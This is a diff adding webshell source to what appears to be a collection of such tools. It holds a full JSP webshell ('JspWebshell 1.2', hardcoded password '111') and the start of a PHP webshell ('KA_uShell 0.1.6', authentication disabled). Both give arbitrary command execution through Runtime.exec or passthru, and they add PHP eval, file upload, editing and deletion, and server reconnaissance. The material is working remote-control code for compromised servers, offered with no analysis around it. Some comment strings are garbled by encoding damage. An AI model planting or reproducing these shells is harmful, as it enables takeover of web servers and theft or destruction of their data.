+                         endPoint=random1.getFilePointer();
+                   }
+              }
+              long length=endPoint-startPoint+1;
+              int order=(int)(length/10000);
+              int left=(int)(length%10000);
+              byte[] c=new byte[10000];
+              random1.seek(startPoint);
+              for(int i=0; i<order; i++)
+              {
+                    random1.read(c);
+                    random2.write(c);
+              }
+              random1.read(c,0,left);
+              random2.write(c,0,left);
+              random1.close();
+              random2.close();
+              f1.delete();
+              out.print("文件上传成功!");
+          }
+          catch(Exception e)
+          {
+              out.print("文件上传失败!");
+          }
+
+		  }
+	
+  %>
+  <tr> 
+    <td width="196" height="48" valign="top" bgcolor="#999999"> 
+      <%  try {
+	//path=request.getParameter("path");
+		//if(path==null)
+		//path=config.getServletContext().getRealPath("/");
+		File f=new File(path);
+	    File[] fList= f.listFiles() ;
+	    for (int j=0;j<fList.length;j++)
+	    {
+		if (fList[j].isDirectory())
+		    {%>
+      <a href="<%=selfName %>?path=<%=path%><%=fList[j].getName()%>\"> <%=fList[j].getName()%></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="?path=<%=path%>&deldir=<%=path%><%=fList[j].getName()%>">删除</a><br> 
+      <% }
+		
+	     }//for
+		 } catch (Exception e) {
+			System.out.println("不存在或没有权限");
+		}
+	%>
+      &nbsp; </td>
+    <td colspan="3" valign="top" bgcolor="#999999"> 
+      <%  try {
+	path=request.getParameter("path");
+		if(path==null)
+		path=config.getServletContext().getRealPath("/");
+		File f=new File(path);
+	    File[] fList= f.listFiles() ;
+	    for (int j=0;j<fList.length;j++)
+	    {
+		if (fList[j].isFile())
+		    {//request.getContextPath()得到虚拟路径%>
+     <%=fList[j].getName()%> 
+       <a href="?path=<%String tempfilepath1=request.getParameter("path"); if(tempfilepath!=null) path=tempfilepath;%><%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">编辑</a> 
+      &nbsp; <a href="?action=del&path=<%=path%>&delfile=<%=path%><%=fList[j].getName()%>">删除</a><br> 
+      <% }
+	     }//for
+		 } catch (Exception e) {
+			System.out.println("不存在或没有权限");
+		}
+	%>
+    </td>
+  </tr>
+</table>
+<p align="center">Power By 绝对零度[B.C.T] QQ:48124012</p>
+<p align="center">&nbsp;</p>
+<%}//if edit
+}
+}
+%>
+</body>
+</html>

php/JspWebshell_1.2.php

@@ -0,0 +1,789 @@
+
+<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %>
+<%
+/**
+ * <p>Title:JspWebshell </p>
+ *
+ * <p>Description: jsp网站管理</p>
+ *
+ * <p>Copyright:绝对零度[B.C.T] Copyright (c) 2006</p>
+ *
+ * <p>Company: zero.cnbct.org</p>
+ *  PS:本程序是小弟处于兴趣所写，如有疑问请联系QQ:48124012
+ * @version 1.2
+ */
+ String path="";
+ String selfName="";
+ boolean copyfinish=false;
+%>
+<%  selfName=request.getRequestURI();
+     // String editfile="";
+        String editfile=request.getParameter("editfile");
+		if (editfile!=null)
+		{editfile=new String(editfile.getBytes("ISO8859_1"));
+		}
+	  path=request.getParameter("path");
+		if(path==null)
+		path=config.getServletContext().getRealPath("/");
+%>
+<%!    
+    String _password ="111";//密码
+	public String readAllFile(String filePathName) throws IOException 
+	{ 
+	FileReader fr = new FileReader(filePathName); 
+	int count = fr.read();
+	String res="";
+	while(count != -1) 
+	{ 
+	//System.out.print((char)count); 
+		res=res+(char)count;
+	count = fr.read(); 
+	if(count == 13) 
+	{ 
+	fr.skip(1); 
+	} 
+	} 
+	fr.close(); 
+	return res;
+	} 
+public void writeFile(String filePathName,String args) throws IOException 
+{ 
+FileWriter fw = new FileWriter(filePathName); 
+PrintWriter out=new PrintWriter(fw); 
+out.write(args); 
+out.println(); 
+out.flush(); 
+fw.close(); 
+out.close(); 
+} 
+public boolean createFile(String filePathName) throws IOException 
+{ 
+boolean result = false; 
+File file = new File(filePathName); 
+if(file.exists()) 
+{ 
+System.out.println("文件已敬嬖冢<EFBFBD>"); 
+} 
+else 
+{ 
+file.createNewFile(); 
+result = true; 
+System.out.println("文件已敬唇ǎ<EFBFBD>"); 
+} 
+return result; 
+}
+public boolean createFolder(String fileFolderName) 
+{ 
+boolean result = false; 
+try 
+{ 
+File file = new File(fileFolderName); 
+if(file.exists()) 
+{ 
+//file.delete(); 
+System.out.println("目录已敬嬖<EFBFBD>!"); 
+result = true; 
+} 
+else 
+{ 
+file.mkdir(); 
+System.out.println("目录已窘<EFBFBD><EFBFBD>!"); 
+result = true; 
+} 
+} 
+catch(Exception ex) 
+{ 
+result = false; 
+System.out.println("CreateAndDeleteFolder is error:"+ex); 
+} 
+return result; 
+}  
+
+public boolean DeleteFolder(String filefolderName) 
+{ 
+boolean result = false; 
+try 
+{ 
+File file = new File(filefolderName); 
+if(file.exists()) 
+{ 
+file.delete(); 
+System.out.println("目录已删除!"); 
+result = true; 
+} 
+} 
+catch(Exception ex) 
+{ 
+result = false; 
+System.out.println("CreateAndDeleteFolder is error:"+ex); 
+} 
+return result; 
+} 
+public boolean validate(String password) {
+	if (password.equals(_password)) {
+		return true;
+	} else {
+		return false;
+	}
+}
+public String HTMLEncode(String str) {
+	str = str.replaceAll(" ", "&nbsp;");
+	str = str.replaceAll("<", "&lt;");
+	str = str.replaceAll(">", "&gt;");
+	str = str.replaceAll("\r\n", "<br>");
+	
+	return str;
+}
+    public String exeCmd(String cmd) {
+	Runtime runtime = Runtime.getRuntime();
+	Process proc = null;
+	String retStr = "";
+	InputStreamReader insReader = null;
+	char[] tmpBuffer = new char[1024];
+	int nRet = 0;
+	
+	try {
+		proc = runtime.exec(cmd);
+		insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312"));
+		while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
+			retStr += new String(tmpBuffer, 0, nRet);
+		}
+		
+		insReader.close();
+		retStr = HTMLEncode(retStr);
+	} catch (Exception e) {
+		retStr = "<font color=\"red\">命令错误\"" + cmd + "\"";
+	} finally {
+		return retStr;
+	}
+	}
+	public boolean fileCopy(String srcPath, String dstPath) {
+	boolean bRet = true;
+	
+	try {
+		FileInputStream in = new FileInputStream(new File(srcPath));
+		FileOutputStream out = new FileOutputStream(new File(dstPath));
+		byte[] buffer = new byte[1024];
+		int nBytes;
+		
+
+		while ((nBytes = in.read(buffer, 0, 1024)) != -1) {
+			out.write(buffer, 0, nBytes);
+		}
+		
+		in.close();
+		out.close();
+	} catch (IOException e) {
+		bRet = false;
+	}	
+	
+	return bRet;
+}
+class EnvServlet
+{
+	public long timeUse=0;
+	public Hashtable htParam=new Hashtable();
+	private Hashtable htShowMsg=new Hashtable();
+	public void setHashtable()
+	{
+		Properties me=System.getProperties();
+		Enumeration em=me.propertyNames();
+		while(em.hasMoreElements())
+		{
+			String strKey=(String)em.nextElement();
+			String strValue=me.getProperty(strKey);
+			htParam.put(strKey,strValue);
+		}
+	}	
+	public void getHashtable(String strQuery)
+	{
+		Enumeration em=htParam.keys();
+		while(em.hasMoreElements())
+		{
+			String strKey=(String)em.nextElement();
+			String strValue=new String();
+			if(strKey.indexOf(strQuery,0)>=0)
+			{
+				strValue=(String)htParam.get(strKey);
+				htShowMsg.put(strKey,strValue);
+			}
+		}
+	}
+	public String queryHashtable(String strKey)
+	{
+		strKey=(String)htParam.get(strKey);
+		return strKey;
+	}
+/*	public long test_int()
+	{
+		long timeStart = System.currentTimeMillis();
+		int i=0;
+		while(i<3000000)i++;
+		long timeEnd = System.currentTimeMillis();
+		long timeUse=timeEnd-timeStart;
+		return timeUse;
+	}
+	public long test_sqrt()
+	{
+		long timeStart = System.currentTimeMillis();
+		int i=0;
+		double db=(double)new Random().nextInt(1000);
+		while(i<200000){db=Math.sqrt(db);i++;}
+		long timeEnd = System.currentTimeMillis();
+		long timeUse=timeEnd-timeStart;
+		return timeUse;
+	}*/
+}
+%>
+<%
+	EnvServlet env=new EnvServlet();
+	env.setHashtable();
+	//String action=new String(" ");
+	//String act=new String("action");
+	//if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act);
+%>
+
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
+<title>JspWebShell By 绝对零度</title>
+<style>
+body {
+	font-size: 12px;
+	font-family: "宋体";
+	background-color: #666666;
+}
+A {
+	COLOR: black; TEXT-DECORATION: none
+}
+A:hover {
+	COLOR: black; TEXT-DECORATION: underline; none: 
+}
+td {
+	font-size: 12px;
+	font-family: "宋体";
+	color: #000000;
+}
+
+input.textbox {
+	border: black solid 1;
+	font-size: 12px;
+	height: 18px;
+}
+
+input.button {
+	font-size: 12px;
+	font-family: "宋体";
+	border: black solid 1;
+}
+
+td.datarows {
+	font-size: 12px;
+	font-family: "宋体";
+	height: 25px;
+	color: #000000;
+}
+.PicBar { background-color: #f58200; border: 1px solid #000000; height: 12px;}
+textarea {
+border: black solid 1;
+}
+.inputLogin {font-size: 9pt;border:1px solid lightgrey;background-color: lightgrey;}
+.table1 {BORDER:gray 0px ridge;}
+.td2 {BORDER-RIGHT:#ffffff 0px solid;BORDER-TOP:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-BOTTOM:#ffffff 0px solid;BACKGROUND-COLOR:lightgrey; height:18px;}
+.tr1 {BACKGROUND-color:gray }
+</style>
+<script language="JavaScript" type="text/JavaScript">
+<!--
+function MM_reloadPage(init) {  //reloads the window if Nav4 resized
+  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
+    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
+  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
+}
+MM_reloadPage(true);
+//-->
+</script>
+</head>
+<body bgcolor="#666666">
+<%
+//session.setMaxInactiveInterval(_sessionOutTime * 60);
+String password=request.getParameter("password");
+if (password == null && session.getAttribute("password") == null) {
+
+%>
+
+<div align="center" style="position:absolute;width:100%;visibility:show; z-index:0;left:4px;top:272px"> 
+  <TABLE class="table1" cellSpacing="1" cellPadding="1" width="473" border="0" align="center">
+    <tr> 
+      <td class="tr1"> <TABLE cellSpacing="0" cellPadding="0" width="468" border="0">
+          <tr> 
+            <TD align="left" bgcolor="#333333"><FONT face="webdings" color="#ffffff">&nbsp;8</FONT><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff"><b>JspWebShell 
+              version 1.2管理登录 :::...</b></font></TD>
+            <TD align="right" bgcolor="#333333"><FONT color="#d2d8ec">Power By 
+              绝对零度</FONT></TD>
+          </tr>
+          <form name="bctform" method="post">
+            <tr bgcolor="#999999"> 
+              <td height="30" colspan="2" align="center" class="td2"> 
+                <input name="password" type="password" class="textbox" id="Textbox" /> 
+                <input type="submit" name="Button" value="Login" id="Button" title="Click here to login" class="button" /> 
+              </td>
+            </tr>
+          </form>
+        </TABLE></td>
+    </tr>
+  </TABLE>
+</div>
+<%
+
+	} else {
+	
+	if (session.getAttribute("password") == null) {
+		
+		if (validate(password) == false) {
+			out.println("<div align=\"center\"><font color=\"red\"><li>密码错误</font></div>");
+			out.close();
+			return;
+		}
+		
+		session.setAttribute("password", password);
+	} else {
+		password = (String)session.getAttribute("password");
+	}
+%>
+	<%
+		File tmpFile = null;
+		String delfile="";
+		String delfile1="";
+		String editpath="";
+		delfile1=request.getParameter("delfile");
+		editpath=request.getParameter("filepath");
+		if (delfile1!=null)
+		{delfile=new String(delfile1.getBytes("ISO8859_1"));
+		}
+        if ( delfile1!= null) {
+        //  out.print(delfile);
+	    	tmpFile = new File(delfile);
+		if (! tmpFile.delete()) {
+			out.print( "<font color=\"red\">删除失败</font><br>\n");
+			}
+			}
+%>
+  <%String editfilecontent=null;
+       String editfilecontent1=request.getParameter("content");
+	   // out.println(editfilecontent1);
+		//String save=request.getParameter("save");
+	   if (editfilecontent1!=null)
+	   {editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));}
+          //   out.print(editfile);
+			//out.print(editfilecontent);
+            if (editfile!=null&editfilecontent!=null)
+			{try {writeFile(editfile,editfilecontent);}
+			 catch (Exception e) {out.print("写入失败");}
+			 out.print("写入成功");
+			}
+			%>
+<%request.setCharacterEncoding("GBK");%>
+<%//String editfile=request.getParameter("editfile");
+//out.print(editfile);
+if (request.getParameter("jsptz")!=null)
+{%>
+<div id="Layer2" style="position:absolute; left:9px; top:340px; width:725px; height:59px; z-index:2"> 
+  <CENTER>
+  <table border="0" cellpadding="0" cellspacing="1" class="tableBorder">
+  <tr> 
+      <td height="22" align="center" bgcolor="#000000" ><font color=#FFFFFF><strong>服务器相关参数</strong></font>      
+      </td>
+  </tr>
+  <tr> 
+    <td style="display" id='submenu0'><table border=0 width=100% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+          <tr bgcolor="#999999" height="22">
+		  <td width="130" bgcolor="#999999">&nbsp;服务器名</td>
+            <td height="22" colspan="3">&nbsp;<%= request.getServerName() %>(<%=request.getRemoteAddr()%>)</td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;服务器操作系统</td>
+            <td colspan="3">&nbsp;<%=env.queryHashtable("os.name")%> <%=env.queryHashtable("os.version")%> 
+              <%=env.queryHashtable("sun.os.patch.level")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;服务器操作系统类型</td>
+            <td>&nbsp;<%=env.queryHashtable("os.arch")%></td>
+            <td>&nbsp;服务器操作系统模式</td>
+            <td>&nbsp;<%=env.queryHashtable("sun.arch.data.model")%>位</td>
+          </tr>     
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;服务器所在地区</td>
+            <td>&nbsp;<%=env.queryHashtable("user.country")%></td>
+            <td>&nbsp;服务器语言</td>
+            <td>&nbsp;<%=env.queryHashtable("user.language")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;服务器时区</td>
+            <td>&nbsp;<%=env.queryHashtable("user.timezone")%></td>
+            <td>&nbsp;服务器时间</td>
+            <td>&nbsp;<%=new java.util.Date()%> </td>
+          </tr>
+		  <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;服务器解译引擎</td>
+            <td width="170">&nbsp;<%= getServletContext().getServerInfo() %></td>
+            <td width="130">&nbsp;服务器端口</td>
+            <td width="170">&nbsp;<%= request.getServerPort() %></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;当前用户</td>
+            <td height="22" colspan="3">&nbsp;<%=env.queryHashtable("user.name")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;用户目录</td>
+            <td colspan="3">&nbsp;<%=env.queryHashtable("user.dir")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td align=left>&nbsp;本文件实际路径</td>
+            <td height="8" colspan="3">&nbsp;<%=request.getRealPath(request.getServletPath())%></td>
+          </tr>
+        </table>
+    </td>
+  </tr>
+</table>
+  <br>
+    <table width="640" border="0" cellpadding="0" cellspacing="1" class="tableBorder">
+      <tr> 
+      <td width="454" height="22" align="center" bgcolor="#000000" onclick="showsubmenu(1)"><font color=#FFFFFF><strong>JAVA相关参数</strong></font> 
+      </td>
+  </tr>
+  <tr> 
+    <td style="display" id='submenu1'>
+		<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+            <tr bgcolor="#666666" height="22"> 
+            <td width="30%">&nbsp;名称</td>
+            <td width="50%" height="22">&nbsp;英文名称</td>
+            <td width="20%" height="22">&nbsp;版本</td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVA运行环境名称</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVA运行环境说明书名称</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.specification.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.specification.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVA虚拟机名称</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVA虚拟机说明书名称</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.version")%></td>
+          </tr>
+		  <%
+		  	float fFreeMemory=(float)Runtime.getRuntime().freeMemory();
+			float fTotalMemory=(float)Runtime.getRuntime().totalMemory();
+			float fPercent=fFreeMemory/fTotalMemory*100;
+		  %>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;JAVA虚拟机剩余内存：</td>
+            <td height="22" colspan="2"><img width='8' height="12" align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fFreeMemory/1024/1024%>M 
+            </td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;JAVA虚拟机分配内存</td>
+            <td height="22" colspan="2"><img width='85%' align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fTotalMemory/1024/1024%>M 
+            </td>
+          </tr>
+        </table>
+		  <table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+            <tr bgcolor="#666666" height="22"> 
+            <td width="30%">&nbsp;参数名称</td>
+            <td width="70%" height="22">&nbsp;参数路径</td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.class.path </td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.class.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>	
+            </td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.home</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.home")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.endorsed.dirs</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.endorsed.dirs")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.library.path</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.library.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%> 
+            </td>
+          </tr>
+		  <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.io.tmpdir</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.io.tmpdir")%></td>
+          </tr>
+        </table>
+    </td>
+  </tr>
+</table>
+  <br>
+  <div id="testspeed" align="center"> </div>
+</CENTER></div>
+
+<%}
+else{
+if (editfile!=null)//if edit
+{
+%>
+<div id="Layer1" style="position:absolute; left:-17px; top:1029px; width:757px; height:250px; z-index:1"> 
+  <table width="99%" height="232" border="0">
+    <tr> 
+      <td height="226"><form name="form2" method="post" action="">
+          <p align="center"> 地址：
+            <input name="editfile" type="text" value="<%=editfile%>" size="50">
+          </p>
+          <p align="center"> 
+            <textarea name="content" cols="105" rows="30"><%=readAllFile(editfile)%></textarea>
+            <input type="submit" name="Submit2" value="保存">
+          </p>
+        </form> </td>
+    </tr>
+  </table>
+  <p>&nbsp;</p></div>
+<%}
+else{%>
+
+<table border="1" width="770" cellpadding="4" bordercolorlight="#999999" bordercolordark="#ffffff" align="center" cellspacing="0">
+  <tr bgcolor="#333333"> 
+    <td colspan="4" align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff">JspWebShell 
+      version 1.0</font><font color="#FFFFFF">(网站目录:<%=config.getServletContext().getRealPath("/")%>)</font></td>
+  </tr>
+  <tr bgcolor="#999999"> 
+    <td colspan="4"> <font color="#000000"> 
+      <%
+	  File[] fs = File.listRoots();
+	  for (int i = 0; i < fs.length; i++){
+	  %>
+      <a href="<%=selfName %>?path=<%=fs[i].getPath()%>\">本地磁盘(<%=fs[i].getPath()%>) 
+      </a> 
+      <%}%>
+      </font></td>
+  </tr>
+  <tr bgcolor="#999999"> 
+    <td height="10" colspan="4"> <font color="#000000"> 
+      <form name="form1" method="post" action="">
+        <input type="text" name="command" class="button">
+        <input type="submit" name="Submit" value="CMD命令执行" class="button">
+      </form>
+      </font> <p> 
+        <%
+		String cmd = "";
+		InputStream ins = null;
+		String result = "";		
+		if (request.getParameter("command") != null) {		
+			cmd = (String)request.getParameter("command");result = exeCmd(cmd);%>
+        <%=result == "" ? "&nbsp;" : result%> 
+        <%}%>
+       </td>
+  </tr>
+  <FORM METHOD="POST" ACTION="?up=true&path=<%String path1=config.getServletContext().getRealPath("/"); String tempfilepath=request.getParameter("path"); if(tempfilepath!=null) path1=tempfilepath;path1=path1.replaceAll("\\\\", "\\\\\\\\"); %><%=path1%>" ENCTYPE="multipart/form-data">
+    <tr bgcolor="#999999"> 
+      <td colspan="2"> <INPUT TYPE="FILE" NAME="FILE1" style="width:150"  SIZE="50" class="button"> 
+        <INPUT TYPE="SUBMIT" VALUE="上传" class="button"> </td>
+      <td colspan="2"><a href="?jsptz=true" target="_blank">JSP探针</a> </td>
+    </tr>
+  </FORM>
+  <%     String fileexe="";
+             String dir="";
+             String deldir=""; 
+			 String scrfile="";
+			 String dstfile="";
+			  fileexe=request.getParameter("fileexe");
+		     dir=request.getParameter("dir");
+			 deldir=request.getParameter("deldir");
+		     scrfile=request.getParameter("scrfile");
+			 dstfile=request.getParameter("dstfile");
+		  if (fileexe!=null)
+			{
+			//out.print(path+fileexe);
+			createFile(path+fileexe); 
+			}
+		  if (dir!=null)
+			{
+			//out.print(path+dir);
+			createFolder(path+dir); 
+			}
+		  if (deldir!=null)
+			{
+			//out.print(deldir);
+		    DeleteFolder(deldir); 
+			}
+			if (scrfile!=null&dstfile!=null)
+			{
+			//out.print(scrfile);
+			//out.print(dstfile);
+			copyfinish=fileCopy(scrfile, dstfile) ;
+			}
+			%>
+  <tr bgcolor="#CCCCCC"> 
+    <td height="10" colspan="2" bgcolor="#999999"> <form name="form3" method="post" action="">
+        文件夹名： 
+        <input name="dir" type="text" size="10" class="button">
+        <input type="submit" name="Submit3" value="新建目录" class="button">
+      </form></td>
+    <td width="188" height="10" bgcolor="#999999"> <form name="form4" method="post" action="">
+        文件名： 
+        <input name="fileexe" type="text" size="8" class="button">
+        <input type="submit" name="Submit4" value="新建文件" class="button">
+      </form></td>
+    <td width="327" height="10" bgcolor="#999999"><form name="form5" method="post" action="">
+        文件<input name="scrfile" type="text" size="15"class="button">
+        复制到
+        <input name="dstfile" type="text" size="15" class="button">
+        <input type="submit" name="Submit5" value="复制" class="button">
+      </form><font color="#FF0000"><%if(copyfinish==true) out.print("复制成功");%></font></td>
+  </tr>
+  <%//上传
+             String tempfilename="";
+             String up=request.getParameter("up");
+			// String tempfilepath=request.getParameter("filepath");
+			// out.print(tempfilepath);
+			  if(up!=null)
+		  {
+	       tempfilename=(String)session.getId();
+          //String tempfilename=request.getParameter("file");
+          File f1=new File(tempfilepath,tempfilename);
+          int n;
+          try
+          {
+              InputStream in=request.getInputStream();
+              BufferedInputStream my_in=new BufferedInputStream(in);
+              FileOutputStream fout=new FileOutputStream(f1);
+              BufferedOutputStream my_out=new BufferedOutputStream(fout);
+              byte[] b=new byte[10000];
+              while((n=my_in.read(b))!=-1)
+              {
+                   my_out.write(b,0,n);
+              }
+              my_out.flush();
+              my_out.close();
+              fout.close();
+              my_in.close();
+              in.close();
+             // out.print("文件创建成功!<br>");
+          }
+          catch(IOException e)
+          {
+              out.print("文件创建失败!");
+          }
+          
+          try
+          {   
+              RandomAccessFile random1=new RandomAccessFile(f1,"r");
+              random1.readLine();
+              String filename=random1.readLine();
+              byte[] b=filename.getBytes("ISO-8859-1");
+              filename=new String(b);
+              int pointer=filename.lastIndexOf('\\');
+              filename=filename.substring(pointer+1,filename.length()-1);
+              File f2=new File(tempfilepath,filename);
+              RandomAccessFile random2=new RandomAccessFile(f2,"rw");
+              random1.seek(0);
+              for(int i=1; i<=4; i++)
+              {
+                   String tempstr=random1.readLine();
+              }
+              long startPoint=random1.getFilePointer();
+              random1.seek(random1.length());
+              long mark=random1.getFilePointer();
+              int j=0;
+              long endPoint=0;
+              while((mark>=0)&&(j<=5))
+              {
+                   mark--;
+                   random1.seek(mark);
+                   n=random1.readByte();
+                   if(n=='\n')
+
+                   {
+                         j++;
+                         endPoint=random1.getFilePointer();
+                   }
+              }
+              long length=endPoint-startPoint+1;
+              int order=(int)(length/10000);
+              int left=(int)(length%10000);
+              byte[] c=new byte[10000];
+              random1.seek(startPoint);
+              for(int i=0; i<order; i++)
+              {
+                    random1.read(c);
+                    random2.write(c);
+              }
+              random1.read(c,0,left);
+              random2.write(c,0,left);
+              random1.close();
+              random2.close();
+              f1.delete();
+              out.print("文件上传成功!");
+          }
+          catch(Exception e)
+          {
+              out.print("文件上传失败!");
+          }
+
+		  }
+	
+  %>
+  <tr> 
+    <td width="196" height="48" valign="top" bgcolor="#999999"> 
+      <%  try {
+	//path=request.getParameter("path");
+		//if(path==null)
+		//path=config.getServletContext().getRealPath("/");
+		File f=new File(path);
+	    File[] fList= f.listFiles() ;
+	    for (int j=0;j<fList.length;j++)
+	    {
+		if (fList[j].isDirectory())
+		    {%>
+      <a href="<%=selfName %>?path=<%=path%><%=fList[j].getName()%>\"> <%=fList[j].getName()%></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="?path=<%=path%>&deldir=<%=path%><%=fList[j].getName()%>">删除</a><br> 
+      <% }
+		
+	     }//for
+		 } catch (Exception e) {
+			System.out.println("不存在或没有权限");
+		}
+	%>
+      &nbsp; </td>
+    <td colspan="3" valign="top" bgcolor="#999999"> 
+      <%  try {
+	path=request.getParameter("path");
+		if(path==null)
+		path=config.getServletContext().getRealPath("/");
+		File f=new File(path);
+	    File[] fList= f.listFiles() ;
+	    for (int j=0;j<fList.length;j++)
+	    {
+		if (fList[j].isFile())
+		    {//request.getContextPath()得到虚拟路径%>
+     <%=fList[j].getName()%> 
+       <a href="?path=<%String tempfilepath1=request.getParameter("path"); if(tempfilepath!=null) path=tempfilepath;%><%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">编<EFBFBD></a> 
+      &nbsp; <a href="?action=del&path=<%=path%>&delfile=<%=path%><%=fList[j].getName()%>">删除</a><br> 
+      <% }
+	     }//for
+		 } catch (Exception e) {
+			System.out.println("不存在或没有权限");
+		}
+	%>
+    </td>
+  </tr>
+</table>
+<p align="center">Power By 绝对零度[B.C.T] QQ:48124012</p>
+<p align="center">&nbsp;</p>
+<%}//if edit
+}
+}
+%>
+</body>
+</html>

php/KA_uShell 0.1.6.php

@@ -0,0 +1,229 @@
+<!--
+
+/+--------------------------------+\
+ |            KA_uShell           |
+ |    <KAdot Universal Shell>     |
+ |         Version 0.1.6          |
+ |            13.03.04            |
+ |  Author: KAdot <KAdot@ngs.ru>  |
+ |--------------------------------|
+\+                                +/
+
+-->
+<html>
+<head>
+<title>KA_uShell 0.1.6</title>
+<style type="text/css">
+<!--
+body, table{font-family:Verdana; font-size:12px;}
+table {background-color:#EAEAEA; border-width:0px;}
+b {font-family:Arial; font-size:15px;}
+a{text-decoration:none;}
+-->
+</style>
+</head>
+<body>
+
+<?php
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+$tend = "</tr></form></table><br><br><br><br>";
+
+// Configuration
+$login = "admin";
+$pass = "123";
+
+
+/*/ Authentication
+if (!isset($_SERVER['PHP_AUTH_USER'])) {
+header('WWW-Authenticate: Basic realm="KA_uShell"');
+header('HTTP/1.0 401 Unauthorized');
+exit;}
+
+else {
+if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
+{ echo "×òî íàäî?"; exit;}
+}
+*/
+
+
+
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "shell";}
+
+// Menu
+echo "
+|<a href=$self?ac=shell>Shell</a>|
+|<a href=$self?ac=upload>File Upload</a>|
+|<a href=$self?ac=tools>Tools</a>|
+|<a href=$self?ac=eval>PHP Eval Code</a>|
+|<a href=$self?ac=whois>Whois</a>|
+<br><br><br><pre>";
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+
+echo <<<HTML
+<b>Shell</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="shell">
+<tr><td>
+$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
+</td></tr>
+<tr><td>
+<textarea cols="100" rows="25">
+HTML;
+
+if (!empty($_POST['c'])){
+passthru($_POST['c']);
+}
+echo "</textarea></td>$tend";
+break;
+
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>PHP Eval Code</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
